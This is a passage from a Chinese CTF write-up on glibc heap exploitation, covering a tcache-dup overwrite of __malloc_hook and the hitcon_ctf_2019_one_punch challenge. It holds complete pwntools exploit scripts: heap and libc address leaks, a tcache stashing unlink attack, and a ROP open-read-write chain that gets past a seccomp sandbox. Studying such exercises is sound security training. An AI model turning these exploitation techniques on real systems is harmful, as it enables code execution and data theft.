show(0)

p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
malloc_hook_addr = libc.symbols["__malloc_hook"] + libc_base
success("malloc_hook_addr==>"+hex(malloc_hook_addr))

#tcache dup
add(0x18,b"tcache dup") #2
free(0)
free(2)

add(0x18,p64(malloc_hook_addr)) #0

add(0x18,b"d")  #2
exeve_addr = one_gadget[2]+libc_base
success("exeve_addr==>"+hex(exeve_addr))
payload = p64(exeve_addr)
add(0x18,payload)
add(0x18,b"get shell")

p.sendline(b"cat flag")
p.interactive()

拿到flag：

例题2：hitcon_ctf_2019_one_punch

题目地址：hitcon_ctf_2019_one_punch

[!IMPORTANT]

在2.29及以后的版本中对 unsorted bin 进行了双向链表检查，故 unsorted bin attack 就不可以再用了，不过 tcache stashing unlink attack 可以达到同样的效果

原理:就是我们从 smallbin中取出 chunk时，会检查：如果当前大小的 smallbin中还有 bin，并且 tcache bin中还有空余的位置 （数量没堆满7个）就会把剩余 chunk 链入到 tcache bin中（可以通过calloc实现，calloc不会从tcache中拿chunk），在链入的过程只对第一个bin进行双向链表检查，后续bin缺少完整性检查（还是因为没有进行双向链表检查造成的，跟unsorted bin attack差不多就是触发前提有所不同)

从上面可以看出，首先需要让 tcache 从 smallbin 中链入一个 chunk，这个怎么做？如何跳过 tcache bin 从 smallbin 取 chunk？

使用 calloc(它不会从 tcache bin里取堆块)

适用版本：目前适用于所有带tcache的glibc版本（2.26—2.36）

利用条件：

1、能使用calloc分配堆块 （在tcache没满时，跳过tcache从smallbin中拿chunk）

2、有溢出或uaf （修改small bin中的bk指针）

思路：

利用tcache stashing unlink attack，将tcache中size为0x220的bin的数量改大 （至少是8才行），从而绕过后门函数的if检查，且保证能申请两次。（原因是要想实现任意地址分配chunk，就要利用malloc函数从伪造的tcache申请，但是要利用malloc函数必须绕过检查，检查是tcache中0x220bin的数量要大于6，也就是说tcache中0x220bin的数量必须保持在7以上，但是count的上限是7，修改掉next指针后完全不够申请两次）。
修改tcache中size为0x220的bin的next指针，指向malloc_hook的地址处。
利用后门函数中的malloc申请到malloc_hook处的chunk，最后ORW获取flag。

分析：

主要看delete函数，堆指针未清0 ，存在UAF漏洞，利用该漏洞来实现tcache stashing unlink attack：
add函数，index只能为0、1、2，其次写入的数据先往栈上写，再copy到堆上（利用这个漏洞往栈上写ROP，然后malloc_hook执行ROP）：

利用：

先填满tcache获取堆的基地址，和libc基地址：

for i in range(0,7):
    add(0,b"a"*0x87)
    free(0)
show(0)
# 获取堆的基地址
p.recvuntil(b"hero name: ")
heap_base = u64(p.recv(6).ljust(8,b"\x00"))&0xfffffffff000
success("heap_base==>"+hex(heap_base))

add(0,b"a"*0x87)
add(1,b"flag"+b"\x00"*(0x87-4))
free(0)
show(0)
#泄漏main_arena中的地址
p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
 
#计算__free_hook和system地址
malloc_hook_addr = libc_base+libc.sym["__malloc_hook"]
success("malloc_hook_addr==>"+hex(malloc_hook_addr))
system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))

利用tcache stashing unlink attack，修改tcache中0x220bin的数量：

add(0,b"a"*0x217)
for i in range(2):
    free(0)
    edit(0,p64(0)*2)
edit(0,p64(malloc_hook_addr))
#进行tcache stashing unlink attack

add(0,b"a"*0xf0)
for i in range(6):  #留一个空间进行
    free(0)
    edit(0,p64(0)*2)

# 构造small bin
add(0,b"a"*0x400)
for i in range(7):
    free(0)
    edit(0,p64(0)*2)
# 生成两个0x100的smallbin
add(0,b"a"*0x400)   #smallbin1 0x100
add(1,b"a"*0x400)
free(0)
add(0,b"a"*0x300)
add(1,b"a"*0x300)  

add(1,b"a"*0x400)   #smallbin2 0x100
add(2,b"a"*0x400)
free(1)
add(2,b"a"*0x300)
add(2,b"a"*0x300)   

#修改fd、bk指针
fd = heap_base+0x11a0	#保证第一个smallbin的检查，与unlink检查一样
bk = heap_base+0x20-5
payload1 = b"A"*0x300 + p64(0) + p64(0x101) + p64(fd) + p64(bk)
edit(1,payload1)

add(0,b"a"*0xf0)
debug()

首先，size为0x100的chunk(符合程序的条件下，随便多大的chunk都行)个数填充为6，这样就只需要两个smallbin就能实现tcache stashing unlink attack ，一个给用户申请走（进行完整性检查），一个unlink后进入tcache。

构造两个一样大的0x100的smallbin：

在这里插入图片描述

其次，修改第二个bin的bk指针，同时保证第一个bin的链的完整性 （堆申请好后，fd值与堆的基地址偏移是固定的）：

最后将0x7f，写入到tcache中0x220bin的count处：

最后在栈上构造ROP读取flag即可（绕过沙箱）由于add函数是先往栈上读数据，再cpy到堆上，所以可以先将ORW读到栈上，然后在calloc时再利用malloc_hook调整栈去执行ORW：


pop_rdi_ret=libc_base+0x000000000002155f
pop_rdx_ret=libc_base+0x0000000000001b96
pop_rax_ret=libc_base+0x00000000000439c8
pop_rsi_ret=libc_base+0x0000000000023e6a
addsp48_addr = libc_base+0x000000000008a1c6
ret=libc_base+0x00000000000008aa

open_addr = libc.sym['open']+libc_base
read_addr = libc.sym['read']+libc_base
write_addr = libc.sym['write']+libc_base    
syscall = read_addr+15
flag = heap_base+0x6e0

# open(flag, 0): rdi = address of the flag path, rsi = 0, rax = 2, then a
# raw syscall gadget (2 is the open syscall number on x86-64).
orw =p64(pop_rdi_ret)+p64(flag)
orw+=p64(pop_rsi_ret)+p64(0)
orw+=p64(pop_rax_ret)+p64(2)
orw+=p64(syscall)			# author's note: a raw syscall is needed because the libc open() found above is blocked by the sandbox
# Alternative kept for reference (calls libc open directly):
# orw =p64(pop_rdi_ret)+p64(flag)
# orw+=p64(pop_rsi_ret)+p64(0)
# orw+=p64(open_addr)		# author's note: this path ends up in openat, which the sandbox blocks

# read(3, heap_base+0x1200, 0x30) -- assumes the open above returned fd 3; TODO confirm
orw+=p64(pop_rdi_ret)+p64(3)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(read_addr)     

# write(1, heap_base+0x1200, 0x30): same buffer as the read above
orw+=p64(pop_rdi_ret)+p64(1)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)# NOTE(review): original note mentioned "address 0x50"; meaning unclear
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(write_addr)

#往malloc上写数据
backdoor(b"aaaa")
backdoor(p64(addsp48_addr))		# 确定栈的偏移为0x48

调试：在进入calloc，访问到malloc_hook后，确定此时ORW在栈上相比与当前栈顶(sp值)的距离。随便给malloc_hook一个地址，在进入calloc之前打上断点：

确定栈上的偏移，存储的ORW肯定在栈的高地址处（因为calloc函数是在add函数里面又调用的，所以calloc的栈肯定在低地址）：

确定栈的偏移是+0x48，所以往malloc_hook的位置写一条add rsp,0x48的指令地址即可：

完整EXP：

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

def debug():
    """Show the PID list for the tube `p` and then pause.

    Presumably a hook for attaching a debugger by hand.
    """
    pid_list = proc.pidof(p)
    print(pid_list)
    pause()

p = remote("node5.buuoj.cn",26347)
# p = process("./pwn")
# p = gdb.debug("./pwn")
libc = ELF('./libc-2.29.so')
elf = ELF("./pwn")

def add(index,content):
    """Choose menu option 1, then send the slot index and the content.

    Each value is sent after the matching prompt ('>' for the menu, ':' for
    the two fields).  All payloads are bytes, matching show() and
    backdoor(); content is expected to be bytes already.
    """
    p.sendlineafter(b'>', b'1')
    p.sendlineafter(b':', str(index).encode())
    p.sendlineafter(b':', content)

def edit(index, content):
    """Choose menu option 2, then send the slot index and the new content.

    Prompts are awaited before each send.  All payloads are bytes; content
    is expected to be bytes already.
    """
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b':', str(index).encode())
    p.sendlineafter(b':', content)

def show(index):
    """Choose menu option 3 after the '>' prompt, then send the index after ':'."""
    encoded_index = str(index).encode()
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b':', encoded_index)

def free(index):
    """Choose menu option 4 after the '>' prompt, then send the index after ':'.

    The menu choice is sent as bytes, consistent with show() and backdoor().
    """
    p.sendlineafter(b'>', b'4')
    p.sendlineafter(b':', str(index).encode())

def backdoor(content):
    """Select the hidden menu entry 50056 after the '>' prompt and send content.

    content is sent immediately afterwards without waiting for a prompt.
    """
    hidden_choice = b"50056"
    p.sendlineafter(b">", hidden_choice)
    p.sendline(content)

for i in range(0,7):
    add(0,b"a"*0x87)
    free(0)
show(0)
p.recvuntil(b"hero name: ")
heap_base = u64(p.recv(6).ljust(8,b"\x00"))&0xfffffffff000
success("heap_base==>"+hex(heap_base))

add(0,b"a"*0x87)
add(1,b"./flag"+b"\x00"*(0x87-6))
free(0)
show(0)
#泄漏main_arena中的地址
p.recv()
addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
success("main_arena_unsortbin_addr==>"+hex(addr))
main_arena_offset = libc.symbols["__malloc_hook"]+0x10
success("main_arena_offset==>"+hex(main_arena_offset))
libc_base = addr-(main_arena_offset+0x60)
success("libc_addr==>"+hex(libc_base))
 
#计算__free_hook和system地址
malloc_hook_addr = libc_base+libc.sym["__malloc_hook"]
success("malloc_hook_addr==>"+hex(malloc_hook_addr))
system_addr = libc_base+libc.sym["system"]
free_hook_addr = libc_base+libc.sym["__free_hook"]
success("system_addr==>"+hex(system_addr))
success("free_hook_addr==>"+hex(free_hook_addr))
# pause()


# 利用tcache stashing unlink attack 将tcache中size为0x220的chunk个数变大
# 将tcache中size为0x220的chunk个数填充2个,修改next指针，为后面利用后门做铺垫

add(0,b"a"*0x217)
for i in range(2):
    free(0)
    edit(0,p64(0)*2)
edit(0,p64(malloc_hook_addr))

#进行tcache stashing unlink attack
add(0,b"a"*0xf0)
for i in range(6):  #留一个空间进行
    free(0)
    edit(0,p64(0)*2)

# 构造small bin
add(0,b"a"*0x400)
for i in range(7):
    free(0)
    edit(0,p64(0)*2)

add(0,b"a"*0x400)   #smallbin1 0x100
add(1,b"a"*0x400)
free(0)
add(0,b"a"*0x300)
add(1,b"a"*0x300)  

add(1,b"a"*0x400)   #smallbin2 0x100
add(2,b"a"*0x400)
free(1)
add(2,b"a"*0x300)
add(2,b"a"*0x300)   

#修改bk指针
fd = heap_base+0x11a0
bk = heap_base+0x20-5
payload1 = b"A"*0x300 + p64(0) + p64(0x101) + p64(fd) + p64(bk)
edit(1,payload1)
add(0,b"a"*0xf0)

#最后在栈上构造ROP读取flag
# 准备ORW
pop_rdi_ret=libc_base+0x0000000000026542
pop_rdx_ret=libc_base+0x000000000012bda6
pop_rax_ret=libc_base+0x0000000000047cf8
pop_rsi_ret=libc_base+0x0000000000026f9e
addsp48_addr = libc_base+0x000000000008cfd6
ret=libc_base+0x000000000002535f

open_addr = libc.sym['open']+libc_base
read_addr = libc.sym['read']+libc_base
write_addr = libc.sym['write']+libc_base    
syscall = read_addr+15
flag = heap_base+0x6e0

# open(flag, 0): rdi = address of the flag path, rsi = 0, rax = 2, then a
# raw syscall gadget (2 is the open syscall number on x86-64).
orw =p64(pop_rdi_ret)+p64(flag)
orw+=p64(pop_rsi_ret)+p64(0)
orw+=p64(pop_rax_ret)+p64(2)
orw+=p64(syscall)
# Alternative kept for reference (calls libc open directly instead of the raw syscall):
# orw =p64(pop_rdi_ret)+p64(flag)
# orw+=p64(pop_rsi_ret)+p64(0)
# orw+=p64(open_addr)

# read(3, heap_base+0x1200, 0x30) -- assumes the open above returned fd 3; TODO confirm
orw+=p64(pop_rdi_ret)+p64(3)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(read_addr)     

# write(1, heap_base+0x1200, 0x30): same buffer as the read above
orw+=p64(pop_rdi_ret)+p64(1)
orw+=p64(pop_rsi_ret)+p64(heap_base+0x1200)# NOTE(review): original note mentioned "address 0x50"; meaning unclear
orw+=p64(pop_rdx_ret)+p64(0x30)
orw+=p64(write_addr)

#往malloc上写数据
backdoor(b"aaaa")
backdoor(p64(addsp48_addr))
add(1,orw)
p.interactive()